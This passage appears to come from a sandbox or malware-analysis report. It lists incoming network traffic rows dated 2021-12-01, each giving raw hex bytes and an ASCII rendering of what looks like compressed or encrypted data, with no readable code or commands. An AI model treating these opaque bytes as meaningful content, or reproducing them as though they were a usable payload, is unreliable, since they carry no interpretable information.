3b 7b bd 62 a0 9e bd a9 38 9c b8 48 ea 42 7e be a7 e7 bc 4f b9 ed 7b 54 65 e6 56 20 00 d9 fe b6 58 20 25 12 f9 c5 47 a3 09 0a 85 31 0f 30 01 67 26 3c 46 a9 2b 28 34 b6 2b 71 02 7c cb c7 72 2c 51 95 ea 1c Data Ascii: 9.7[^_Ks/A\Pb.VIw'$HAx\Mo o\@mkMhY9aD[2NJP\~!Kfpk8OCr+!/ Tk;D0T'b-pu#*!RH}[;{b8HB~O{TeV X %G10g&<F+(4+q\|r,Q
2021-12-01 18:10:27 UTC	109	IN	Data Raw: 79 6c 29 cf 0d 35 45 c1 c5 f8 68 c5 59 26 dd c8 c7 05 b3 e4 01 88 17 30 9c 49 34 6e 41 03 c2 cc b4 56 a6 f0 74 8e 89 32 a6 2a 0c ab a3 56 65 25 7d dc 2d ff d2 ff 67 32 05 41 24 5e eb 77 33 ca ac 55 72 4f 22 8b b8 03 36 6e 70 46 93 35 e7 12 3a 4a 3c 24 6e 7a 99 39 1c ab 15 46 83 a8 83 12 10 28 30 00 61 77 c1 f3 5e a6 a9 50 f9 aa 9f 86 e2 9f 08 43 fe 51 75 46 fc cf 55 8c 92 29 05 1c 7e ed 42 23 c4 78 b7 71 0f 55 6c a8 8b a8 6c 99 38 a3 97 0f 59 7f d3 96 48 d8 fe ea 72 9f f7 33 98 51 4f 62 58 b3 33 d6 ef 66 28 2b 1b d3 0a 21 3c d3 14 d3 71 c2 93 70 17 aa ad 0f d7 73 b9 47 15 1a ca 3c de f6 c3 c9 33 de 4d 1f aa d7 51 bd f0 bf 9b 05 3b 39 d5 de 90 0e ed 79 77 b2 65 b9 20 a4 7c 31 e1 97 28 ca f1 fd 45 4e 52 a8 14 f1 a1 27 ca 3a a5 a3 2f db 4a 69 5e d9 6c 82 20 Data Ascii: yl)5EhY&0I4nAVt2*Ve%}-g2A$^w3UrO"6npF5:J<$nz9F(0aw^PCQuFU)~B#xqUll8YHr3QObX3f(+!<qpsG<3MQ;9ywe \|1(ENR':/Ji^l
2021-12-01 18:10:27 UTC	111	IN	Data Raw: 7b 9a 15 d4 02 d4 96 51 be 6c 7e 83 28 1e c5 a5 60 d8 c1 cf 01 93 f7 f4 31 7d 7b bc 00 eb e5 48 23 eb 50 13 db 54 77 01 d5 74 36 56 5c d2 bf 4b 0f b3 cf cf 90 38 3a 73 55 97 88 7f c4 b9 ae e4 e6 8b 1f 1d 94 ba af bf 7a e7 e3 ed 77 33 98 a5 b3 a3 3f 91 2b 5f 84 5a a0 e5 e9 92 de cf cc e8 af 49 8b 54 eb 08 45 a2 19 94 ad 58 8d 94 5f 49 65 be 02 a9 b4 46 75 68 c7 1c d9 e2 68 fb d8 c0 d9 27 0f c9 8e 64 f1 46 f1 73 90 48 dc ef 14 71 cc 32 a1 9c bf 1b 82 c4 0a a0 89 16 10 45 6d ab a3 57 1b 5a 85 5b 8b 65 88 40 e0 ec 21 33 a1 63 5b ad b2 d6 f0 8e db 78 30 ad 01 43 48 ad ac 53 8d 72 74 dd 7e 27 e3 ab f1 6e 3f 6a 35 c4 74 72 02 ef 89 8c 09 fe 06 fe b7 12 bb 9b 7c 0d aa 75 e6 7b 9c ad 58 8b c4 e9 9d c6 b9 fe 91 54 21 76 9c 33 29 f6 76 89 02 00 e0 23 a2 e9 3e b9 e7 Data Ascii: {Ql~(`1}{H#PTwt6V\K8:sUzw3?+_ZITEX_IeFuhh'dFsHq2EmWZ[e@!3c[x0CHSrt~'n?j5tr\|u{XT!v3)v#>
2021-12-01 18:10:27 UTC	112	IN	Data Raw: cb dc 02 86 2d c1 78 c1 d4 57 7e 31 e8 d7 b6 f8 b4 a0 22 8c 4e fa 9e 57 dd 04 fc 87 11 09 3b 3d be 38 41 74 49 f9 19 da f7 8c 25 40 da 64 f9 d2 d4 3a 32 23 a4 76 49 3a 3e 36 51 4e 60 95 c9 4c 01 30 91 c2 9b bb 2a fd 28 2d 18 8c f2 79 f2 29 cf 0d 24 09 c4 c5 fe 2f 61 5e 26 d1 aa 47 2c a0 eb 29 a9 78 29 97 42 e0 68 5c 1b 85 1f b1 56 aa e2 29 71 76 c7 75 3e 1b d5 1c 6f 65 2f 63 c8 3b f8 ac 7e 5d 32 03 68 58 08 eb 7d 11 41 86 a0 70 67 0a a3 bf 2f 59 16 70 07 fd 1d d2 12 3a 40 2f 0e 79 69 91 0a 4d aa 15 7e 92 af 81 65 27 29 30 04 0e bc c3 f1 54 7c b1 cc ee 70 88 7a 6e 8a 08 2d fe 42 7c 46 ed c8 57 f7 a5 28 05 1a 11 26 40 a8 cf a2 af b1 18 8f 7f 1a 99 a2 47 ad 29 aa 86 05 5b 79 bc 5e 4a d8 f4 5b 62 97 2f b1 4e 40 45 29 82 65 2b d7 80 92 29 2b 1d fb 19 3b 0c d0 Data Ascii: -xW~1"NW;=8AtI%@d:2#vI:>6QN`L0*(-y)$/a^&G,)x)Bh\V)qvu>oe/c;~]2hX}Apg/Yp:@/yiM~e')0T\|pzn-B\|FW(&@G)[y^J[b/N@E)e+)+;
2021-12-01 18:10:27 UTC	113	IN	Data Raw: 28 a7 d9 38 61 70 78 f2 d1 28 07 34 0c 25 c7 36 a6 d9 71 bd c9 ca 52 72 a0 91 48 32 2d d1 cb 4a 82 9a 1e ba 03 0f 2b 89 32 7c bf d7 1d ea db 0b b4 1c 83 78 df c1 a9 20 1c ad 13 95 74 3f 71 5c c3 61 b9 e5 2f c2 f7 d5 88 ae af 04 29 7d 93 04 08 bb ff 92 4e 86 a1 75 85 13 15 da 97 82 d9 ed ef 06 e4 0b ca 66 7b 70 d3 fc ea e5 4e 4c 3b 52 74 b6 43 b8 74 04 76 37 47 64 be 40 e6 0f b5 d0 15 83 33 2b 4a 59 8d 83 87 b6 2e b8 e3 83 7d 16 72 2e af 75 a2 a1 14 5b ed 77 38 9f b3 d0 d3 34 91 30 47 9d 32 06 f5 c3 f5 b3 d8 1a ef c4 4f 98 5f ea 0a 4a ba 57 f9 ac 74 8e c3 cd 4a 65 b4 31 b4 b6 49 5d 71 c9 07 21 8c 84 ff ce d9 f5 8a 1c c2 84 59 e8 48 d8 a5 98 61 cf ea 72 a6 18 a3 bc 29 bd cd 0f e5 01 b1 8c 75 ce 69 7e aa a4 6e f5 46 ba a3 f4 da 83 43 e3 94 8f a2 b2 6d 4f fc Data Ascii: (8apx(4%6qRrH2-J+2\|x t?q\a/)}Nuf{pNL;RtCtv7Gd@3+JY.}r.u[w840G2O_JWtJe1I]q!YHar)ui~nFCmO
2021-12-01 18:10:27 UTC	114	IN	Data Raw: e9 19 31 0c cb 1f 39 33 3c 92 b0 06 a9 b5 09 8c 50 af 56 10 21 d4 4e 6a fc dc 82 33 d3 5c 08 b5 e0 f3 41 f1 95 aa 81 2b ef d2 b0 7f 01 fc 71 66 cc 90 1a 31 ac 00 ee f2 98 36 c9 3c 1f bb 4c 52 a3 68 1b b1 37 da fb 34 ad 18 df 69 ce 4f d2 79 92 cf ab 41 76 f2 62 03 11 d8 c0 0d cf e0 e0 00 79 03 f8 65 f3 a4 9e c9 2d 49 6a 5d 8f 55 48 aa 52 8f f0 83 05 6a 8e b0 88 86 81 83 c0 1e 9d 39 2b 88 4e 19 b8 50 44 2e 81 be a0 64 d0 ef c1 0b 5a 62 c6 d0 07 80 ba 0b 12 45 87 c4 16 5a ae 3c 98 db 38 7e 4a 8d ec dc c6 17 1f 02 2f 5e 57 3e ae 5c 66 da c8 52 7c a0 91 48 32 2d d1 c9 4a 82 9a 03 ac 6a eb 45 70 35 6d bf a7 d2 fb d0 01 ba 08 8f 49 21 d1 8e 2d e5 c3 c3 9c 77 30 f1 47 a6 ae a8 ee 25 cc c7 d9 b2 50 bf 23 3d 73 64 12 f2 21 9f 96 53 b4 b4 6d 80 1d 10 d6 af 7c c9 ca Data Ascii: 193<PV!Nj3\A+qf16<LRh74iOyAvbye-Ij]UHRj9+NPD.dZbEZ<8~J/^W>\fR\|H2-JjEp5mI!-w0G%P#=sd!Sm\|
2021-12-01 18:10:27 UTC	115	IN	Data Raw: 37 a3 12 18 bd b4 bd 92 e1 00 70 1d 38 dd 4a 24 e2 81 54 98 76 15 8e 03 6d e8 77 f2 66 e3 04 58 ed 43 76 6d dc 9b 89 2b 98 20 fe b1 18 93 a3 7c 2d e0 f0 ce ec b6 ac 4e 3c b9 a8 9c de bd 91 16 2f 6e 77 9c 37 3e 2c 61 5f 8f be 75 23 b6 8e 7b b8 e6 86 78 48 c0 bd de 2f cb 51 6f cb bd 62 5d a4 d3 47 d1 70 ba 64 a4 b1 7a be a1 e0 34 54 47 ec 56 47 72 f4 51 ad 1d ca f1 9e 13 25 38 e6 f2 37 40 84 5a 78 84 31 01 3f 6c 2b 0f 04 42 a1 37 f5 1c 85 00 71 08 62 99 de 72 3d 54 8a e0 e2 6b 10 68 ac 45 a2 34 f3 6e a9 37 bb 0a 0c ea 0e e5 1d c1 3a b6 8a b3 7b 54 a1 08 48 05 ca d2 d9 2c ce bc 8f 51 ab f9 65 63 f3 54 64 c2 d1 79 41 f8 ff 34 40 f7 ab 7d 6c 03 bd d4 5e d3 50 13 6f 5d 0c c0 62 5e c4 b8 9b 44 ab d6 9a ca cd f0 1d a6 2f bc 52 b8 d4 53 62 32 e3 d3 a2 71 b7 a0 2c Data Ascii: 7p8J$TvmwfXCvm+ \|-N</nw7>,a_u#{xH/Qob]Gpdz4TGVGrQ%87@Zx1?l+B7qbr=TkhE4n7:{TH,QecTdyA4@}l^Po]b^D/RSb2q,
2021-12-01 18:10:27 UTC	116	IN	Data Raw: 0c d6 31 2c 6b 7f b5 e3 5e a6 b2 1e e4 b9 92 ac f2 92 11 d3 fe 7d 6b 52 87 86 54 8c 96 3f 0c 6a ff ed 42 a9 d3 7a cc 20 0e 55 68 85 3d 80 59 94 38 a9 8d 1c 54 7f c2 99 57 d2 00 52 5f 8e e1 ab e3 12 4e 31 5e a4 e9 d3 e5 75 2d 34 10 c0 07 3a 1d d7 0b 31 8d c3 bf 96 06 ae ab c7 49 5c a6 5f 07 04 c3 5e 67 e9 ca 3d 21 f4 6d 1b c5 b7 d4 bf f4 b1 f8 9a 3c 39 ce c9 8b 14 d4 f6 63 a3 6a 0d bc ad 6f 3e f1 8c 28 ca ce d3 6a 4e 58 81 5d e1 b0 3d b3 f0 3b b2 35 c0 7d c4 4d d4 66 b5 3c b5 62 84 e2 44 18 52 98 8d ed 20 ec da 13 63 0e f6 63 12 97 4c c2 10 5d 7e 82 84 86 5f b2 50 86 d8 85 09 71 7a ae 97 c6 88 f8 99 14 82 00 c1 a1 78 17 bb d8 e4 aa 9e 68 7a 76 c7 f6 ee 1e 47 6b ff ca 18 be 4e a8 2f 4a ac ae f8 a2 45 37 b0 45 1c 7e 5b 87 e0 f5 29 1e 25 18 b0 c1 e8 1f 15 8a Data Ascii: 1,k^}kRT?jBz Uh=Y8TWR_N1^u-4:1I\_^g=!m<9cjo>(jNX]=;5}Mf<bDR ccL]~_PqzxhzvGkN/JE7E~[)%
2021-12-01 18:10:27 UTC	118	IN	Data Raw: db 0f e4 40 e8 1b 4b 8f 51 18 b5 d5 ac fb 46 49 e5 f8 2f 85 a1 68 43 73 f2 19 df 2a a8 f9 d8 31 f1 96 1e df 97 4d c8 14 f5 4a 9c 5a 22 e8 57 b2 d6 21 ae f3 bb 1e 9b 30 00 9d 88 6d fb 5d 7e a4 a4 6e fb 41 7b 5c d9 f8 8a 2f 23 83 59 39 b9 34 46 92 ae a0 85 8b db 63 18 24 21 4e 75 a8 97 47 99 74 0a 8f 64 d9 e8 5b f4 4f e3 54 ab ee 2c bb 02 e5 90 e5 02 f4 03 fe b1 18 93 a3 3c 56 83 ab e6 7d b6 ac 44 7b fb b2 b5 4f b9 93 1e e3 3a a0 11 18 29 f6 77 82 14 92 fb 94 a0 29 2d bd eb a9 70 4a c9 a5 15 07 a1 be 13 ca b7 6e ad ad db 76 c4 61 bf 5c ea 52 78 be ab d9 d2 4a b9 e7 e6 49 66 24 73 8a 11 dd c5 47 05 0a 25 0b c3 18 57 39 21 3d 85 cd 05 3d 06 7b 1d 01 7e 02 21 f6 34 b0 10 74 1e 82 8b f7 7a 3d 55 9c 7b 10 77 3a fa ac 54 a7 2f 76 2a 84 31 bd 1b 73 b6 1c e0 19 d8 Data Ascii: @KQFI/hCs1MJZ"W!0m]~nA{\/#Y94Fc$!NuGtd[OT,<V}D{O:)w)-pJnva\RxJIf$sG%W9!=={~!4tz=U{w:T/v1s
2021-12-01 18:10:27 UTC	119	IN	Data Raw: ee 2f c0 9d 31 96 44 85 dc 50 12 a7 07 9c 11 ad ca 07 60 7f db 50 18 18 ba d0 02 ef 24 7c f6 4e 76 c3 8a 56 39 14 44 43 66 1c 76 39 10 89 b1 71 5b 0c 4e bb 29 30 79 fd 00 f7 35 e6 03 24 5b 22 1f 46 5f 9c 32 1a 09 04 60 97 bc 97 36 b3 28 30 0a 70 70 d5 d9 b1 a2 a9 12 ee 27 98 ac e3 9e 1b 32 ee 4e 63 78 da ca 55 8a 30 38 1a 0a 6a f9 6a 0b c5 78 bd 41 32 57 6c 01 a2 19 6c 95 32 9a 5a 0e 59 7f da 80 60 1b fd 53 75 88 7a ae 98 51 4e 22 7a a2 13 d6 f9 ea 17 2b 1b d2 a8 2b 2c ce 00 32 5b 61 93 9c 1d be 94 d2 59 58 bf 50 99 0e c3 4f 6b e5 e2 d2 01 ce 4a 95 81 ff d5 be 52 a8 ad 9c 28 2d fd 7c 83 00 f6 63 49 60 6f 1b 37 bd e2 39 f0 98 3d cd c4 61 48 58 45 25 38 e1 b0 36 7e 3c 1b a6 2b d8 4a 6d 5e d9 6c b0 19 69 6e 7a e5 7f 92 56 b4 3d f3 23 dc c6 30 64 15 65 51 ec Data Ascii: /1DP`P$\|NvV9DCfv9q[N)0y5$["F_2`6(0pp'2NcxU08jjxA2Wll2ZY`SuzQN"z++,2[aYXPOkJR(-\|cI`o79=aHXE%86~<+Jm^linzV=#0deQ
2021-12-01 18:10:27 UTC	120	IN	Data Raw: cd 1a a3 e3 cb 66 77 5f 88 01 eb ef 3c 31 eb 50 6f 3c 18 63 1b d1 0a 7b 4c 6c d5 b5 3a f9 b1 cf 21 b5 10 1c 5b 52 98 9b 6b a3 08 84 dc ec 87 1d af ca ba af b5 75 b1 57 e8 77 3f bb 88 dc c0 35 b9 10 4c 82 7b c1 3d ed fd ba d9 41 c9 db 0b 8a 47 f1 19 69 82 62 07 ab 70 a3 fb 46 42 16 47 2f 85 a3 51 49 71 d6 73 2e 8c a8 ff b7 2c f3 96 05 da a1 70 ed 56 f5 5b 8b 68 f4 0e 79 b1 c4 be 81 f3 aa 00 91 d2 10 ad 99 51 f9 43 6d a7 b2 f2 f9 59 85 5c e1 e2 9c 68 49 83 59 39 89 41 55 bc b2 af be 66 d9 72 17 23 c3 5b 71 83 84 54 9a 62 96 8d 7e 27 e8 63 e2 70 c9 dc 10 ec 49 5a 2b e0 9a 8f 37 dc eb fc b1 12 bb 4a 7e 0d aa ba fa 69 9e 84 40 8b c2 fd 10 d9 b9 93 15 40 39 62 b4 90 29 f6 7c a1 28 90 75 25 a1 db d6 bb e6 88 7a a1 c2 bd c7 37 7f 51 13 c0 91 7f bb b8 c7 7e 40 60 Data Ascii: fw_<1Po<c{Ll:![RkuWw?5L{=AGibpFBG/QIqs.,pV[hyQCmY\hIY9AUfr#[qTb~'cpIZ+7J~i@@9b)\|(u%z7Q~@`
2021-12-01 18:10:27 UTC	122	IN	Data Raw: 96 5e 83 76 a2 dc 0e e2 c0 8a 09 3b 3d f9 e6 42 74 45 dd 28 cc e4 9d 4a 29 cd 7b d3 21 d7 10 49 f8 a8 08 0f 24 32 28 57 2e bc 88 cb 4a 11 0b 82 dc ba a2 31 fa 11 2b 02 a8 0a 17 c7 34 de 17 0c b5 ed e8 fb 07 75 73 08 d5 a7 48 2c 5f ec 29 a5 78 16 94 42 ec 5b 75 01 ba 0b a5 41 b3 c5 f3 70 5a c2 69 3b 0c b2 b9 e8 64 25 76 e3 28 f1 d3 99 4b 32 14 57 54 28 15 76 15 1d f7 82 74 4f 22 b2 af 36 14 7d 67 07 e6 22 f8 09 c4 4b 10 1d 7f 7c 88 36 34 cd 14 7e 89 c7 74 1f 10 2e 23 12 7e 6d d2 e6 5e b7 be 0e 07 ab b3 a6 9d 0c 08 2d f5 42 71 4b ef d8 55 9d 85 36 0c e0 7f c1 49 b9 d0 69 a3 f3 1c 50 73 01 99 bf 6c 84 2f bc 9d f1 58 53 c9 85 4d f0 d5 56 73 99 df 8d 98 51 45 19 6b b3 33 ca d6 23 d6 d4 e4 cc 01 29 1b da 05 31 6c d9 6d 9d 3b 89 ad 03 35 a4 b8 47 12 1f ac 9e 68 Data Ascii: ^v;=BtE(J){!I$2(W.J1+4usH,_)xB[uApZi;d%v(K2WT(vtO"6}g"K\|64~t.#~m^-BqKU6IiPsl/XSMVsQEk3#)1lm;5Gh
2021-12-01 18:10:27 UTC	123	IN	Data Raw: be c9 c6 22 a2 b2 9a 4e 34 49 1f d7 b4 89 d9 f1 bc 6c f5 39 86 25 60 d6 44 ce e8 dd 17 c4 d2 92 73 d5 bf 5e 3d e2 aa 27 f2 a6 34 e0 45 a6 82 ab ee 29 c0 f2 db b7 2e e2 29 22 7a 8b 1c f6 36 ee 96 57 a7 b9 0d a7 00 1e c3 b7 6c c9 d1 c5 6e a3 f5 cb 60 6c 67 ad 0c c3 c8 4d 23 ed 78 5a be 54 64 33 39 76 37 47 03 f5 bd e7 09 a2 df 30 9b 10 06 5e 52 94 a0 57 b5 02 aa cc 00 85 17 78 47 9e ad b5 71 88 60 ee 18 13 91 ac da c6 2e 81 4e 5a 83 71 f2 2a e0 d8 92 f8 cc e2 d1 18 9f 7c d2 1b 41 af b9 07 bc 52 90 2d 55 42 74 be 3f 92 9b 37 a3 9f 3d 0d ca 9a 7e ea cd db e4 87 19 47 33 77 08 aa 0a a4 9f 67 dc a8 4f b1 ce 32 ab f3 aa 48 82 ce 01 ba 8d 79 d1 19 6d a1 a4 6d fe 59 85 47 f5 f6 89 40 ea 83 59 ae a1 69 50 d1 b5 b9 96 84 d9 72 1d 3d df 4f 59 b1 80 54 9d 6f 2b 83 7e Data Ascii: "N4Il9%`Ds^='4E).)"z6Wln`lgM#xZTd39v7G0^RWxGq`.NZq*\|AR-UBt?7=~G3wgO2HymmYG@YiPr=OYTo+~
2021-12-01 18:10:27 UTC	124	IN	Data Raw: 30 b0 a2 86 7a 54 ab 0a 4a 79 8d ca d8 28 d8 8d 84 51 ab c2 18 25 f2 4e 60 cb d6 f5 4e 3e e8 79 40 f7 aa 76 b5 6d c2 d7 5c c0 3d 11 10 21 0b bd 23 75 c4 af ba 44 a9 47 d9 cb cd fc 2d 84 3c c5 e9 ac 99 57 74 38 e8 af ec 32 b6 a4 55 e8 55 ec f5 a1 0c 49 fa af 00 20 2f 37 96 65 6b 74 4e d1 3d a5 8a 8b 4a 3c d9 70 0d de c0 c2 5c e3 a0 5a 6e 27 31 a2 f1 5c 14 95 c9 4e 15 1a f2 43 9a b1 22 d2 58 3e 1d 86 89 69 ea 28 cb 04 0b bc be ba ff 07 77 59 5d 57 a6 4e 00 9b 03 2b af 1d 34 82 bc eb 52 ae 13 a6 0c 98 7b ae ce 83 c6 0b 4f 79 3c 19 b8 d4 16 e7 24 7c f4 09 b6 c1 8a 56 4f 84 41 4b 0d ef 61 3b 6d 05 a1 76 4b 26 da 3d 28 36 6a 58 ea f5 35 ed 15 2e b4 3d 1f 90 7b 95 3a 30 ec 17 7b 0d 1f fe 9a 11 28 34 02 63 0c 45 f0 5e a2 81 4c fb aa 95 d1 60 9e 08 29 fa 47 77 2b Data Ascii: 0zTJy(Q%N`N>y@vm\=!#uDG-<Wt82UUI /7ektN=J<p\Zn'1\NC"X>i(wY]WN+4R{Oy<$\|VOAKa;mvK&=(6jX5.={:0{(4cE^L`)Gw+
2021-12-01 18:10:27 UTC	125	IN	Data Raw: 83 7f db 29 75 6b 54 91 a9 16 c2 da 8a d8 90 1e f0 a1 82 b1 b3 90 9c f9 0f aa 29 d7 89 64 3e ed a0 6a 26 99 6c 61 ed f1 dd f5 3e 4a 7d fb c1 30 93 46 0a 38 66 e5 d7 70 a4 51 27 bb 52 16 53 50 a0 ef e2 08 09 3f 27 01 d2 e0 31 9c d0 c2 50 cd 4d 5a ae 00 6d 0e 2d e8 c8 ab bf a9 00 95 41 f1 2a 8f 1e 37 c7 21 ce e8 df 1f 31 26 bd 78 f9 ce bd 77 fd a1 17 b0 75 36 e6 65 ab 02 33 ef 2f d7 e3 c3 23 75 83 24 04 61 93 0c 86 35 e0 be 7c b6 b2 78 af 60 60 5c a5 7c dc de c7 9b ae da c7 40 62 7d a3 64 f4 ee 60 0e e9 50 72 96 0a 1c 82 d4 74 33 52 67 4b 9a ca 04 95 d0 2a 8f 57 32 73 7f 90 88 7f 9d 60 d2 7d ed 87 13 6d 24 22 8a 98 7b bf 6f e1 68 4b 8c b0 f4 ed 3d 91 27 66 ec 0f 61 f5 ef f9 a5 c2 56 c7 f6 04 ad 4b e7 3b cf a5 67 07 b2 52 af d6 44 48 63 9e 40 fb 3c 43 5d 64 Data Ascii: )ukT)d>j&la>J}0F8fpQ'RSP?'1PMZm-A7!1&xwu6e3/#u$a5\|x``\\|@b}d`Prt3RgKW2s`}m$"{ohK='faVK;gRDHc@<C]d
2021-12-01 18:10:27 UTC	127	IN	Data Raw: a0 68 e2 ca 78 be a1 ee 3b 60 94 ef 7a 46 5b 98 00 1a 01 d9 f0 81 37 ba 00 35 fd 3d 48 b3 01 b9 87 31 05 23 3f 40 0c 04 40 83 4b 88 ad b1 01 75 1d 4a 10 fe 5f 22 77 8a dc 3c e6 2b ff ac 5d 8a 1b 8a 2b ae 1d d5 76 ee ad 0f e1 06 fe b6 95 8f 88 5c 4b 9c 2a c4 7b 8d d3 c0 00 f5 96 85 57 81 b8 66 bc f3 54 64 d4 ef 35 69 ed f3 13 5f cf 88 e5 b4 10 b9 cd 74 e9 3d 15 6b 77 60 c3 be 5e c4 b8 95 79 33 88 f4 c5 eb eb 15 a4 bb c5 17 b9 c8 7f 59 38 ea d7 f3 58 c8 39 29 96 50 f3 cb 39 f9 29 f4 89 1d 32 1b ab 94 6f 43 69 67 fc 35 d8 f1 a0 20 46 43 65 f3 db c9 07 c7 cc 8b 78 65 3a 09 0c e5 23 94 94 d0 62 3a 1a 89 c5 b1 df 58 63 01 3c 19 93 c8 8c ce 05 c0 21 02 82 e5 63 fc 07 73 44 2f ff 8a 4c 04 b5 c4 43 d1 8e 31 96 46 f5 79 ca 37 80 05 92 49 91 ea a2 73 76 cd 6f 14 30 Data Ascii: hx;`zF[75=H1#?@@KuJ_"w<+]+v\K*{WfTd5i_t=kw`^y3Y8X9)P9)2oCig5 FCexe:#b:Xc<!csD/LC1Fy7Isvo0
2021-12-01 18:10:27 UTC	128	IN	Data Raw: db c1 c3 26 f2 32 67 27 fe d5 bb ef dd 16 ad 11 36 f3 c0 e7 20 88 73 61 a3 73 3b 19 87 6d 3e f6 b2 56 a0 7f 71 6a 4a 4d cc 9d c4 9d 39 fa 32 5c 92 ab c8 62 ce 42 f1 4b a6 31 ac 47 14 9d f1 1e 51 b0 22 94 aa da fa 1c 54 1c 8f 4e 76 92 60 c8 1e 48 41 79 95 83 46 96 29 f5 41 95 04 6e 9b c8 21 b0 a7 8d f7 0a e5 24 7f 8d 62 14 a0 f6 de 25 99 6e 50 19 aa 69 fe 18 55 7d bf 41 3d 93 4b 2c 21 24 9f 06 ed a5 51 3c a8 e0 1e 7c 5b 80 d9 97 46 8f 32 0f 28 cf 89 ad 93 a7 b2 ef d3 24 7e 0d 9e 48 23 3d e6 f8 b6 83 b0 25 d3 12 6a 2b 89 30 72 d3 22 ea c5 d4 27 b4 69 b0 b0 db d0 a2 23 c7 84 12 9f 77 30 ca 21 b7 e5 ab ee 2b cc 97 50 9c 7d a1 0e 3d 15 ba fb da 2a ec 89 5a 9c 9f 7c 85 04 34 ab da e5 d9 c1 c9 1e e7 6d ee 4b 72 51 a3 6c cb 16 4c 23 eb 4f 61 94 79 60 1b d3 5e 5d Data Ascii: &2g'6 sas;m>VqjJM92\bBK1GQ"TNv`HAyF)An!$b%nPiU}A=K,!$Q<\|[F2($~H#=%j+0r"'i#w0!+P}=*Z\|4mKrQlL#Oay`^]
2021-12-01 18:10:27 UTC	129	IN	Data Raw: 27 e9 57 bf 63 e1 7f 0f c0 6b 5f 00 e5 9c a3 a3 8a 9a ff b1 1c b3 33 7c 0d a0 31 c3 50 a7 8a 64 1b c4 eb 9d fe cc 94 14 54 37 5e b1 31 29 f0 5c 0b 7c 0c 74 23 b3 d3 af b9 e6 82 c8 6d ed ac eb 3f 5f 51 13 ca 9d 1b ad a4 d3 4c ef 4e bd 5c c4 9a f8 c0 38 f0 31 4c 99 7f 7a 40 71 68 5b ae 11 ff d4 0c 02 20 25 38 8e 1c 57 86 39 15 a8 33 05 3b 3d ef 70 9d 47 a9 25 d6 a7 b0 01 71 98 59 a7 ca 54 0c c2 95 ea 1c 4a 56 f8 ac 45 bf 1e a5 29 a8 31 95 8a 09 35 0e e5 1d e9 b8 b0 a2 86 e0 71 86 1b 6c 59 19 d3 d9 28 f8 12 82 51 ab cc 30 08 f0 54 66 e1 55 d1 d5 c1 fd 31 60 62 a8 74 b6 8a 9c fb 4d e2 1f 80 6d 5d 0a 9d a9 58 c4 bc 9d 68 84 af d9 cd e7 76 52 1d 2c c7 13 99 42 57 74 3a 70 f4 f4 23 90 80 be 96 54 ec d1 2c db 04 fa b8 2a 25 39 37 90 45 c1 0a d6 d0 37 dc d7 1d 4a Data Ascii: 'Wck_3\|1PdT7^1)\\|t#m?_QLN\81Lz@qh[ %8W93;=pG%qYTJVE)15qlY(Q0TfU1`btMm]XhvR,BWt:p#T,*%97E7J
2021-12-01 18:10:27 UTC	130	IN	Data Raw: 62 1b f5 60 3f 4d 6c ce a3 cf 22 b1 cf 27 ba be 55 c2 53 92 8c 59 11 02 ac e4 76 a2 3a 60 0e 98 09 b5 77 99 50 dd 7f 39 93 b3 c5 e8 12 93 21 4a a8 f7 86 6d ee fd be ef 6b e2 db 0b 11 71 c7 09 67 85 c0 07 ad 58 a7 b2 4e 48 65 ab 27 ad 88 40 5d 66 e8 9a a1 14 a9 f9 dc ea 59 96 0f c9 1e 6d ce 45 d3 7b 31 4d dc e9 5b e3 c6 32 ab ec ba 33 af cc 01 b7 a7 fb af de 6c a1 a0 5f 57 59 85 5d 6f d3 a5 51 cc a3 f0 33 a1 69 70 de bc b9 96 95 f3 5f 1f 32 d9 65 db d5 19 55 9c 70 3b 20 7e 27 e9 ed d3 49 f0 59 30 46 43 72 02 c5 fd 81 21 f4 19 d6 9c 1a 93 a5 56 8f de 32 e7 7d b2 8c ef 8b c4 eb 07 fb 94 82 32 74 86 76 9c 33 09 9d 7e 89 02 8b 5d 0e b5 f3 38 93 64 fc cb 49 c0 b9 ed b3 ce 51 13 50 98 4f bb 82 f3 fa c7 63 bf 7c b1 b8 7a be b8 d9 1c 4a b9 eb 50 c6 0f 6b 7f 83 04 Data Ascii: b`?Ml"'USYv:`wP9!JmkqgXNHe'@]fYmE{1M[23l_WY]oQ3ip_2eUp; ~'IY0FCr!V2}2tv3~]8dIQPOc\|zJPk
2021-12-01 18:10:27 UTC	131	IN	Data Raw: 11 f8 3b 8a 4a 38 fa e5 f9 df d6 23 7e c1 8b 74 43 23 18 aa 38 b8 95 94 cd 6a da 18 89 c3 01 94 0b e8 26 1c d0 8c f4 16 cb 8c c5 07 1d a1 e6 ed d3 05 73 5d 0c 51 d9 d7 05 b3 ea 09 61 17 30 96 d8 cf 69 42 34 8d c5 b4 56 ac ea ca 7b 76 cd 67 1e 35 97 d4 6d 63 0f fa 8e b8 ef c3 8e 7c fd 05 40 4b 93 ce 5a 2b 30 a4 6f 76 4f 24 81 56 23 36 6e 6f 25 df 18 e5 10 3c 60 ba 77 f7 7b 99 36 3c 7b 15 7e 83 32 a6 33 02 0e 10 d0 61 77 c1 d1 55 ad a9 14 e6 89 b7 81 e1 9f 0e 07 79 2f ec 51 fc cb 75 5d 92 29 05 84 5b c0 50 8e e5 a9 b7 69 0f 75 42 00 8a a8 73 b0 10 8e 95 0f 5f 55 55 ea d1 d9 fe 57 53 4d f7 a9 98 cb 6a 1c 48 95 13 12 ef 66 28 0b 48 d8 0a 3a 13 fc 3c 0b 71 c2 95 b6 91 d4 25 10 5a 5c 99 94 14 09 c3 d5 4f db d1 e5 00 0b 5c 19 be df ac b4 f0 b9 93 af 14 14 d7 df Data Ascii: ;J8#~tC#8j&s]Qa0iB4V{vg5mc\|@KZ+0ovO$V#6no%<`w{6<{~23awUy/Qu])[PiuBs_UUWSMjHf(H:<q%Z\O\
